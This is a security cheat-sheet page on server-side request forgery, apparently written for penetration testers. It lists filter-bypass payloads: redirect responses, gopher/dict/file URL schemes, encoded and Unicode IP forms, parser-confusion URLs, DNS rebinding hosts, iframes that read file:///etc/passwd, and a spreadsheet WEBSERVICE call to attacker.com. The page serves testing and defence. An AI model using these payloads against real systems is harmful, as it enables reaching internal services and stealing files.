💻
Application Security Cheat Sheet
  • Application Security Cheat Sheet
  • Android Application
    • Overview
      • Application Data & Files
      • Application Package
      • Application Sandbox
      • Application Signing
      • Deployment
      • Package Manager
    • Intent Vulnerabilities
      • Deep Linking Vulnerabilities
    • WebView Vulnerabilities
      • WebResourceResponse Vulnerabilities
      • WebSettings Vulnerabilities
  • CI/CD
    • Dependency
      • Dependency Confusion
      • Dependency Hijaking
      • Typosquatting
    • GitHub
      • GitHub Actions
      • Code owners
      • Dependabot
      • Redirect
      • Releases
  • Cloud
    • AWS
      • Amazon API Gateway
      • Amazon Cognito
      • Amazon S3
  • Container
    • Overview
      • Container Basics
      • Docker Engine
    • Escaping
      • CVE List
      • Exposed Docker Socket
      • Excessive Capabilities
      • Host Networking Driver
      • PID Namespace Sharing
      • Sensitive Mounts
    • Container Analysis Tools
  • Framework
    • Spring
      • Overview
      • Mass Assignment
      • Routing Abuse
      • SpEL Injection
      • Spring Boot Actuators
      • Spring Data Redis Insecure Deserialization
      • Spring View Manipulation
    • React
      • Overview
      • Security Issues
  • Linux
    • Overview
      • Philosophy
      • File
      • File Descriptor
      • I/O Redirection
      • Process
      • Inter Process Communication
      • Shell
      • Signals
      • Socket
      • User Space vs Kernel Space
    • Bash Tips
  • iOS Application
    • Overview
      • Application Data & Files
      • Application Package
      • Application Sandbox
      • Application Signing
      • Deployment
    • Getting Started
      • IPA Patching
      • Source Code Patching
      • Testing with Objection
  • Resources
    • Lists
      • Payloads
      • Wordlists
    • Researching
      • Web Application
      • Write-ups
    • Software
      • AWS Tools
      • Azure Tools
      • Component Analysis
      • Docker Analysis
      • Dynamic Analysis
      • Fuzzing
      • GCP Tools
      • Reverse Engineering
      • Static Analysis
      • Vulnerability Scanning
    • Training
      • Secure Development
  • Web Application
    • Abusing HTTP hop-by-hop Request Headers
    • Broken Authentication
      • Two-Factor Authentication Vulnerabilities
    • Command Injection
      • Argument Injection
    • Content Security Policy
    • Cookie Security
      • Cookie Bomb
      • Cookie Jar Overflow
      • Cookie Tossing
    • CORS Misconfiguration
    • File Upload Vulnerabilities
    • GraphQL Vulnerabilities
    • HTML Injection
      • base
      • iframe
      • link
      • meta
      • target attribute
    • HTTP Header Security
    • HTTP Request Smuggling
    • Improper Rate Limits
    • JavaScript Prototype Pollution
    • JSON Web Token Vulnerabilities
    • OAuth 2.0 Vulnerabilities
      • OpenID Connect Vulnerabilities
    • Race Condition
    • Server Side Request Forgery
      • Post Exploitation
    • SVG Abuse
    • Weak Random Generation
    • Web Cache Poisoning
Powered by GitBook
On this page
  • Bypass filters
  • Redirection
  • URL scheme
  • IP address formats
  • Abusing a bug in Ruby's native resolver
  • Broken parser
  • DNS pinning
  • DNS rebinding
  • Adobe ColdFusion
  • FFmpeg
  • SVG
  • Server-side processing of arbitrary HTML and JS
  • Spreadsheet exporting
  • Request splitting
  • HTTP headers
  • Referer header
  • References
  1. Web Application

Server Side Request Forgery

PreviousRace ConditionNextPost Exploitation

Last updated 2 years ago

Server-side request forgery (or SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.

In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organization's infrastructure, or to external third-party systems.

Bypass filters

Applications often block input containing non-whitelist hostnames, sensitive URLs, or IP addresses like loopback, IPv4 link-local, , etc. In this situation, it is sometimes possible to bypass the filter using various techniques.

Redirection

You can try using a redirection to the desired URL to bypass the filter. To do this, return a response with the 3xx code and the desired URL in the Location header to the request from the vulnerable server, for example:

HTTP/1.1 301 Moved Permanently
Server: nginx
Connection: close
Content-Length: 0
Location: http://127.0.0.1

You can achieve redirection in the following ways:

  • bash, like nc -lvp 80 < response.txt

  • URL shortener services

  • Mock and webhook services, see

  • More flexible solutions such as a simple HTTP server on python

Also, if the application contains an open redirection vulnerability you can use it to bypass the URL filter, for example:

POST /api/v1/webhook HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 101

url=https://vulnerable-website.com/api/v1/project/next?currentProjectId=1929851&path=http://127.0.0.1

These bypass approaches work because the application only validates the provided URL, which triggers the redirect. It follows the redirect and makes a request to the internal URL of the attacker's choice.

URL scheme

You can try to use different URL schemes:

file://path/to/file
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
dict://127.0.0.1:1337/stats
ftp://127.0.0.1/
sftp://attacker-website.com:1337/
tftp://attacker-website.com:1337/TESTUDPPACKET
ldap://127.0.0.1:389/%0astats%0aquit
ldaps://127.0.0.1:389/%0astats%0aquit
ldapi://127.0.0.1:389/%0astats%0aquit
gopher://attacker-website.com/_SSRF%0ATest!

Node.js

Node.js for Windows considers any single letter in a URL scheme as drive://filepath and set the protocol to file://.

// Node.js (Windows only)
// the following row will return `file:`
new URL('l://file').protocol

References:

Java

Java's URL will correctly handle the next URLs:

url:file:///etc/passwd
url:http://127.0.0.1:8080

References:

IP address formats

You can try using a different IP address format to bypass the filter.

Rare IP address

  • Dotted hexadecimal IP: 0x7f.0x0.0x0.0x1

  • Dotless hexadecimal IP: 0x7f001

  • Dotless hexadecimal IP with padding: 0x0a0b0c0d7f000001 (padding is 0a0b0c0d)

  • Dotless decimal IP: 2130706433

  • Dotted decimal IP with overflow (256): 383.256.256.257

  • Dotted octal IP: 0177.0.0.01

  • Dotless octal IP: 017700000001

  • Dotted octal IP with padding: 00177.000.0000.000001

  • Combined:

    0x7f.0.1
    0x7f.1
    00177.1
    00177.0x0.1

You can short-hand IP addresses by dropping the zeros:

1 part  (ping A)       : 0.0.0.A
2 parts (ping A.B)     : A.0.0.B
3 parts (ping A.B.C)   : A.B.0.C
4 parts (ping A.B.C.D) : A.B.C.D

0       => 0.0.0.0
127.1   => 127.0.0.1
127.0.1 => 127.0.0.1

IPv6 address

  • IPv6 localhost:

    [::]
    0000::1
    [::1]
    0:0:0:0:0:0:0:0
  • IPv4-mapped IPv6 address: [::ffff:7f00:1]

  • IPv4-mapped IPv6 address: [::ffff:127.0.0.1]

Abuse of enclosed alphanumerics

127。0。0。1
127。0。0。1
127.0.0.1
⑫7。⓪.𝟢。𝟷
𝟘𝖃𝟕𝒇。𝟘𝔵𝟢。𝟢𝙭⓪。𝟘𝙓¹
⁰𝔁𝟳𝙛𝟢01
2𝟏𝟑𝟢𝟕𝟢6𝟺𝟛𝟑
𝟥𝟪³。𝟚⁵𝟞。²₅𝟞。²𝟧𝟟
𝟢₁𝟳₇。0。0。𝟢𝟷
𝟎𝟢𝟙⑦⁷。000。𝟶𝟬𝟢𝟘。𝟎₀𝟎𝟢0𝟣
[::𝟏②₇.𝟘.₀.𝟷]
[::𝟭2𝟟。⓪。₀。𝟣%𝟸𝟭⑤]
[::𝚏𝕱ᶠ𝕗:𝟏₂7。₀。𝟢。①]
[::𝒇ℱ𝔣𝐹:𝟣𝟤7。₀。0。₁%②¹𝟧]
𝟎𝚇𝟕𝖋。⓪。𝟣
𝟎ˣ𝟩𝘍。𝟷
𝟘𝟘①𝟕⑦.1
⓪𝟘𝟙𝟳𝟽。𝟎𝓧₀。𝟏

Abusing a bug in Ruby's native resolver

Resolv::getaddresses is OS-dependent, therefore by playing around with different IP formats one can return blank values.

Proof of concept:

irb(main):001:0> require 'resolv'
=> true
irb(main):002:0> uri = "0x7f.1"
=> "0x7f.1"
irb(main):003:0> server_ips = Resolv.getaddresses(uri)
=> [] # The bug!
irb(main):004:0> blocked_ips = ["127.0.0.1", "::1", "0.0.0.0"]
=> ["127.0.0.1", "::1", "0.0.0.0"]
irb(main):005:0> (blocked_ips & server_ips).any?
=> false # Bypass

References:

Broken parser

  • Embedded credentials in a URL before the hostname, using the @ character: https://expected-host@evil-host

  • Indication a URL fragment using the # character: https://evil-host#expected-host

  • DNS naming hierarchy: https://expected-host.evil-host

  • URL-encode characters. This can help confuse URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.

  • Combinations of these techniques together:

    foo@evil-host:80@expected-host
    foo@evil-host%20@expected-host
    evil-host%09expected-host
    127.1.1.1:80\@127.2.2.2:80
    127.1.1.1:80:\@@127.2.2.2:80
    127.1.1.1:80#\@127.2.2.2:80
    ß.evil-host

References:

DNS pinning

If you want to get a A-record that resolves to an IP, use the following subdomain:

make-<IP>-rr.1u.ms 

For example, domain resolves make-127-0-0-1-rr.1u.ms to 127.0.0.1:

$ dig A make-127-0-0-1-rr.1u.ms
make-127-0-0-1-rr.1u.ms. 0	IN	A	127.0.0.1

Multiple records can be separated by -and-:

make-<IP>-and-<IP>-rr.1u.ms

For example, domain resolves make-127-0-0-1-and-127-127-127-127-rr.1u.ms to 127.0.0.1 and 127.127.127.127:

$ dig A make-127-0-0-1-and-127-127-127-127-rr.1u.ms
make-127-0-0-1-and-127-127-127-127-rr.1u.ms. 0 IN A 127.0.0.1
make-127-0-0-1-and-127-127-127-127-rr.1u.ms. 0 IN A 127.127.127.127

Also, check sslip.io:

DNS rebinding

If the mechanisms in vulnerable application for checking and establishing a connection are independent and there is no caching of the DNS resolution response, you can bypass this by manipulating the DNS resolution response.

For example, if two requests go one after the other within 5 seconds, DNS resolution make-1-1-1-1-rebind-127-0-0-1-rr.1u.ms will return the address 1.1.1.1 by the first request, and the second - 127.0.0.1.

$ dig A make-1-1-1-1-rebind-127-0-0-1-rr.1u.ms
make-1-1-1-1-rebind-127-0-0-1-rr.1u.ms. 0 IN A 1.1.1.1

$ dig A make-1-1-1-1-rebind-127-0-0-1-rr.1u.ms
make-1-1-1-1-rebind-127-0-0-1-rr.1u.ms. 0 IN A 127.0.0.1

Also, check lock.cmpxchg8b.com:

Adobe ColdFusion

FFmpeg

SVG

Server-side processing of arbitrary HTML and JS

Server-side processing of arbitrary HTML and JS data from a user can often be found when generating various documents, for example, to PDFs. If this functionality is vulnerable to HTML injection and/or XSS, you can use this to access internal resources:

<iframe src="file:///etc/passwd" width="400" height="400">
<img src onerror="document.write('<iframe src=//127.0.0.1></iframe>')">

Use HTTPLeaks to determine if any of the allowed HTML tags could be used to abuse the processing.

References:

Spreadsheet exporting

=WEBSERVICE('https://attacker.com')

References:

Request splitting

HTTP headers

Many applications use in their flows IP addresses/domains, which they received directly from users in different HTTP headers, such as the X-Forwarded-For or Client-IP headers. Such application functionality can lead to a blind SSRF vulnerability if the header values are not properly validated.

Referer header

Also notice the Referer header, which is used by server-side analytics software to track visitors. Such software often logs the Referer header from requests, since this allows to track incoming links.

The analytics software will actually visit any third-party URL that appears in the Referer header. This is typically done to analyze the contents of referring sites, including the anchor text that is used in the incoming links. As a result, the Referer header often represents fruitful attack surface for SSRF vulnerabilities.

References

@phithon_xg tweets and

Rare IP address formats, defined in :

IPv4-compatible IPv6 address (deprecated, q.v. : [::127.0.0.1]

IPv4-mapped IPv6 address with : [::ffff:7f00:1%25]

IPv4-mapped IPv6 address with : [::ffff:127.0.0.1%eth0]

Enclosed alphanumerics is a Unicode block of typographical symbols of an alphanumeric within a circle, a bracket or other not-closed enclosure, or ending in a full stop, q.v. .

The contains a number of features that are liable to be overlooked when implementing ad hoc parsing and validation of URLs:

If an application is running on a Windows server and exporting to a spreadsheet try to use function to gain a SSRF:

This is where the can be useful for searching the HTTP headers.

@PwnFunction tweet
1
2
RFC 3986
RFC4291
zone identifier
zone identifier
list
Bypassing Server-Side Request Forgery filters by abusing a bug in Ruby's native resolver
Report: Blind SSRF in "Integrations" by abusing a bug in Ruby's native resolver
Report: SSRF vulnerability in gitlab.com via project import
URL specification
Writeup: URL whitelist bypass in https://cxl-services.appspot.com
Writeup: Fixing the Unfixable: Story of a Google Cloud SSRF
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!
Tool: Tiny URL Fuzzer
Viral Video Exploiting Ssrf In Video Converters
Attacks on video converters: a year later
Report: SSRF and local file disclosure in https://wordpress.com/media/videos/ via FFmpeg HLS processing
Report: SSRF / Local file enumeration / DoS due to improper handling of certain file formats by ffmpeg
Tool: ffmpeg-avi-m3u-xbin
Write up: Local File Read via XSS in Dynamically Generated PDF
Write up: Exploiting HTML-to-PDF Converters through HTML Imports
Report: Blind SSRF/XSPA on dashboard.lob.com + blind code injection
Report: Bypassing HTML filter in "Packing Slip Template" Lead to SSRF to Internal Kubernetes Endpoints
WEBSERVICE
@intigriti tweet
param-miner
Web Security Academy: Server-side request forgery (SSRF)
Blind SSRF exploitation
PayloadsAllTheThings: Server Side Request Forgery
Report: SSRF in CI after first run
Report: GitLab::UrlBlocker validation bypass leading to full Server Side Request Forgery
Report: Gitlab DNS rebinding protection bypass
Write up: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!
private addresses
GitHub - neex/1u.msGitHub
GitHub - neex/1u.msGitHub
Welcome to sslip.io
Logo
rbndr.us dns rebinding service
Logo
here
SSRF in ColdFusion/CFML Tags and Functions
Logo
SVG Abusecheat-sheets
Logo
Logo
GitHub - cure53/HTTPLeaks: HTTPLeaks - All possible ways, a website can leak HTTP requestsGitHub
Security Bugs in Practice: SSRF via Request Splittingrfkelly
Logo
Logo
Logo